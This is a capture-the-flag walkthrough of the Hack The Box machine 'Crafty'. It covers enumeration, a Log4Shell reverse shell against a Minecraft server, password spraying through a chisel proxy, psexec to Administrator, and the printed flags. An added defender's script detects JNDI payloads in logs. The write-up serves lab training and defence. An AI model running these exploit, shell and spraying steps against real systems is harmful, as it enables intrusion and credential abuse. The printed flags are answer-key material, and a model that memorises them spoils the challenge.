
Nmap Results
# Nmap 7.94SVN scan initiated Mon Feb 12 16:23:27 2024 as: nmap -Pn -p- -sT --min-rate 2000 -A -oN nmap.txt 10.10.11.249
Nmap scan report for 10.10.11.249
Host is up (0.011s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 10.33 ms 10.10.14.1
2 10.52 ms 10.10.11.249
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 12 16:24:48 2024 -- 1 IP address (1 host up) scanned in 81.07 seconds
The http-title result shows a redirect to http://crafty.htb. Let's go ahead and add that to our /etc/hosts file.
echo '10.10.11.249 crafty.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/80


Let's also add play.crafty.htb to our /etc/hosts file while we're here.
echo '10.10.11.249 play.crafty.htb' | sudo tee -a /etc/hosts
Gobuster Enumeration
Directory and File Enumeration
crafty.htb
gobuster dir -u http://crafty.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,asp,aspx,txt -o gobuster-80.txt -t 100
/Index.html (Status: 301) [Size: 145] [--> http://crafty.htb/home]
/Home (Status: 200) [Size: 1826]
/coming-soon.html (Status: 301) [Size: 152] [--> http://crafty.htb/coming-soon]
/coming-soon (Status: 200) [Size: 1206]
/css (Status: 301) [Size: 145] [--> http://crafty.htb/css/]
/home (Status: 200) [Size: 1826]
/img (Status: 301) [Size: 145] [--> http://crafty.htb/img/]
/index.html (Status: 301) [Size: 145] [--> http://crafty.htb/home]
/js (Status: 301) [Size: 144] [--> http://crafty.htb/js/]
play.crafty.htb
gobuster dir -u http://play.crafty.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,asp,aspx,txt -o gobuster-80.txt -t 100 --exclude-length 140
/Index.html (Status: 301) [Size: 150] [--> http://play.crafty.htb/home]
/Home (Status: 200) [Size: 1826]
/coming-soon.html (Status: 301) [Size: 157] [--> http://play.crafty.htb/coming-soon]
/coming-soon (Status: 200) [Size: 1206]
/home (Status: 200) [Size: 1826]
/index.html (Status: 301) [Size: 150] [--> http://play.crafty.htb/home]
Virtual Host Enumeration
gobuster vhost -k --domain crafty.htb --append-domain -u http://10.10.11.249 -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 100 -o vhost.txt --exclude-length 334
No additional virtual hosts found.
TCP/25565
Researching the Minecraft Version


This official Minecraft help article also seems to indicate the existence of a Log4J vulnerability for this version of Minecraft.


TLauncher is a bit sketchy (even if they're adamant about being spyware/malware free). Just be aware of this prerequisite going into the challenge. I'd encourage you to take a snapshot of your machine and roll back once you've completed this box.
Install Minecraft Launcher
wget https://tlauncher.org/jar -O TLauncher.zip
unzip TLauncher.zip
java -jar ./TLauncher-2.895.jar

1.16.5.



Exploit
Host the Malicious Java Class
This exploit works by causing the Minecraft server to reach out to our LDAP server and read and execute our malicious Java code over the network.
The JDK archive this PoC depends on requires an Oracle account to download. I already had one before working on this box.
git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
python3 -m pip install -r requirements.txt
Once you've downloaded the jdk archive to the working directory, extract it.
tar -xzvf jdk-8u20-linux-x64.tar.gz
We need to update the poc.py script, as it's written to run /bin/sh through a Java socket. Run nano poc.py and change line 26 from /bin/sh to powershell.exe.

Now, host the exploit files.
python3 poc.py --userip 10.10.14.15 --webport 8000 --lport 443
And start a listener:
sudo rlwrap nc -lnvp 443
Finally, press the t key to bring up the chat window and run the exploit on the target.
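As an added, defender-side example that is not part of the original post: the chat message that triggers the exploit above is written to the Minecraft server log, so a scanner over that log is a direct detection. This Python script (mine, not the box author's or the PoC's) flags JNDI lookups in chat lines, including the nested lower/upper and `${::-x}` forms used to disguise them; the log lines are constructed samples.

```python
import re
from typing import Optional

# Constructed sample lines in the Minecraft server log format (not taken from the page).
# Lines 3-5 carry JNDI lookups (one plain, two disguised); line 6 is a harmless lookup.
SAMPLE_LOG = """\
[16:41:02] [Server thread/INFO]: Steve joined the game
[16:41:10] [Server thread/INFO]: <Steve> hello everyone
[16:41:30] [Server thread/INFO]: <Steve> ${jndi:ldap://10.0.0.5:1389/a}
[16:42:01] [Server thread/INFO]: <Alex> ${${lower:j}ndi:${lower:l}${lower:d}ap://10.0.0.5:1389/a}
[16:42:15] [Server thread/INFO]: <Alex> ${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://10.0.0.5:1099/x}
[16:43:00] [Server thread/INFO]: <Steve> my home is ${env:HOME}
"""

# Chat lines look like "[HH:MM:SS] [Server thread/INFO]: <player> message"
CHAT = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[Server thread/INFO\]: <([^>]+)> (.*)$")
# Text-rewriting lookups commonly nested to hide the word "jndi": ${lower:x}, ${upper:x}, ${::-x}
OBFUSCATED = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{:{1,2}-([^{}]*)\}", re.IGNORECASE)
# A JNDI lookup naming one of the protocols Log4j 2.x will resolve
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{[^{}]*\}")


def normalize(text: str) -> str:
    """Collapse nested lower/upper/default-value lookups until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = OBFUSCATED.sub(lambda m: (m.group(1) if m.group(1) is not None else m.group(2)).lower(), text)
    return text

def classify(message: str) -> Optional[str]:
    """Return 'jndi-lookup', 'other-lookup' or None for one chat message."""
    norm = normalize(message)
    if JNDI.search(norm):
        return "jndi-lookup"
    if ANY_LOOKUP.search(norm):
        return "other-lookup"
    return None

def scan_log(log: str) -> list:
    """Return one finding per chat line whose message contains a lookup, with the de-obfuscated text."""
    findings = []
    for n, line in enumerate(log.splitlines(), 1):
        m = CHAT.match(line)
        if not m:
            continue
        verdict = classify(m.group(3))
        if verdict:
            findings.append({"line": n, "player": m.group(2), "verdict": verdict, "normalized": normalize(m.group(3))})
    return findings
```

Point scan_log at the server's logs/latest.log to review what players typed; on this box the payload goes in through the chat window, which is exactly the line the server records.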


Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: CRAFTY
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA944
Original Install Date: 4/10/2020, 9:48:06 AM
System Boot Time: 2/14/2024, 7:28:04 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,296 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,644 MB
Virtual Memory: In Use: 2,155 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CRAFTY
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.249
[02]: fe80::9bc2:3118:f102:a65f
[03]: dead:beef::a97c:137d:be30:771e
[04]: dead:beef::224
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
==================== ==============================================
crafty\svc_minecraft S-1-5-21-4088429403-1159899800-2753317549-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
Name Enabled Description
---- ------- -----------
Administrator True Built-in account for administering the computer/domain
DefaultAccount False A user account managed by the system.
Guest False Built-in account for guest access to the computer/domain
jacob True
svc_minecraft True
WDAGUtilityAccount False A user account managed and used by the system for Windows Defender Application Guard scen...
Local Groups
Name Description
---- -----------
Access Control Assistance Operators Members of this group can remotely query authorization attributes and permission...
Administrators Administrators have complete and unrestricted access to the computer/domain
Backup Operators Backup Operators can override security restrictions for the sole purpose of back...
Certificate Service DCOM Access Members of this group are allowed to connect to Certification Authorities in the...
Cryptographic Operators Members are authorized to perform cryptographic operations.
Device Owners Members of this group can change system-wide settings.
Distributed COM Users Members are allowed to launch, activate and use Distributed COM objects on this ...
Event Log Readers Members of this group can read event logs from local machine
Guests Guests have the same access as members of the Users group by default, except for...
Hyper-V Administrators Members of this group have complete and unrestricted access to all features of H...
IIS_IUSRS Built-in group used by Internet Information Services.
Network Configuration Operators Members in this group can have some administrative privileges to manage configur...
Performance Log Users Members of this group may schedule logging of performance counters, enable trace...
Performance Monitor Users Members of this group can access performance counter data locally and remotely
Power Users Power Users are included for backwards compatibility and possess limited adminis...
Print Operators Members can administer printers installed on domain controllers
RDS Endpoint Servers Servers in this group run virtual machines and host sessions where users RemoteA...
RDS Management Servers Servers in this group can perform routine administrative actions on servers runn...
RDS Remote Access Servers Servers in this group enable users of RemoteApp programs and personal virtual de...
Remote Desktop Users Members in this group are granted the right to logon remotely
Remote Management Users Members of this group can access WMI resources over management protocols (such a...
Replicator Supports file replication in a domain
Storage Replica Administrators Members of this group have complete and unrestricted access to all features of S...
System Managed Accounts Group Members of this group are managed by the system.
Users Users are prevented from making accidental or intentional system-wide changes an...
Network Configurations
Network Interfaces
InterfaceAlias : Ethernet0
InterfaceIndex : 12
InterfaceDescription : vmxnet3 Ethernet Adapter
NetProfile.Name : Network 6
IPv6Address : dead:beef::a97c:137d:be30:771e
dead:beef::224
IPv4Address : 10.10.11.249
IPv6DefaultGateway : fe80::250:56ff:feb9:89e0
IPv4DefaultGateway : 10.10.10.2
DNSServer : 127.0.0.1
8.8.8.8
Open Ports
LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- --------------
:: 49668 :: 0 Listen
:: 49667 :: 0 Listen
:: 49666 :: 0 Listen
:: 49665 :: 0 Listen
:: 49664 :: 0 Listen
:: 25565 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
:: 80 :: 0 Listen
0.0.0.0 49668 0.0.0.0 0 Listen
0.0.0.0 49667 0.0.0.0 0 Listen
0.0.0.0 49666 0.0.0.0 0 Listen
0.0.0.0 49665 0.0.0.0 0 Listen
0.0.0.0 49664 0.0.0.0 0 Listen
10.10.11.249 139 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listen
Interesting Files
C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar
When I first came across this file, I didn't think much of it, but looking at C:\inetpub\wwwroot\index.html, I could see the 1277 players string was hard-coded in. So, why have this plugin if it's not doing anything?
Privilege Escalation
Inspecting the Minecraft Plugin
As mentioned in my post-exploit enumeration, why have the C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar plugin if it's not doing anything? The player count of 1277 is hard-coded in the index.html file.
I have a PowerShell module called PSToolbox over on GitHub with some useful tools, one of them being a script to dump strings from a file.
The output isn't beautiful, but it's helpful enough to find something interesting. This plugin is custom built for this server, with lots of mentions of crafty throughout.

Let's transfer the .jar file to Kali and inspect it using jd-gui. I'll be using the web method and Apache running on Kali to transfer the file.

Decompiling the JAR File
sudo apt install -y jd-gui jadx
jd-gui ./playercounter-1.0-SNAPSHOT.jar
Poking through the code, this particular bit sticks out to me: s67u84zKq8IXw looks like it might be a password of some kind.

We need to find out more about the Rcon class, as inspecting it will tell us what the constructor arguments mean. 127.0.0.1 is obviously an IP, 27015 is most likely a TCP port, and s67u84zKq8IXw is unknown, but seems like a password.

Expand net.kronos.rkon.core, click on Rcon.class, and let's explore. We can quite easily find our answer. The Rcon constructor takes three arguments: host, port, and password. So, this plugin attempts to make a connection to tcp/27015 on 127.0.0.1 using the password s67u84zKq8IXw.

You'll recall however that tcp/27015 was not in the list of bound ports in our post-exploit enumeration. But perhaps we can reuse this password with one of the active accounts on the system. Looking at our post-exploit enumeration, this could be:
Administrator
jacob
svc_minecraft
Proxied Password Spraying
Reverse SOCKS5 Proxy

Download and extract the chisel binaries:
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz -O chisel.exe.gz
gunzip chisel*.gz
chmod u+x ./chisel
Start the chisel server on Kali:
sudo ./chisel server --port 8081 --reverse &
Host chisel.exe over HTTP:
sudo python3 -m http.server 80
Download chisel.exe to the target:
cd ~\Downloads
iwr http://10.10.14.15/chisel.exe -o chisel.exe
Start chisel.exe in the background and open tcp/5555 on Kali as a reverse SOCKS5 proxy:
$scriptBlock = { Start-Process ~\Downloads\chisel.exe -ArgumentList @('client','10.10.14.15:8081','R:5555:socks') }
Start-Job -ScriptBlock $scriptBlock

Edit the proxychains configuration so it uses the SOCKS5 proxy on 127.0.0.1 port 5555:
sudo nano /etc/proxychains4.conf
Create a list of users:
echo -e 'Administrator\njacob\nsvc_minecraft' > users.txt
Spray the password through the proxy:
proxychains -q crackmapexec smb crafty.htb --local-auth -u users.txt -p 's67u84zKq8IXw'

Escalate to Administrator

proxychains -q impacket-psexec 'CRAFTY/Administrator:s67u84zKq8IXw@crafty.htb'
Flags
User
9f5ec297012a8786d692ca2382e125e2
Root
36c89b3d7873707c237fc4b0fc45c036
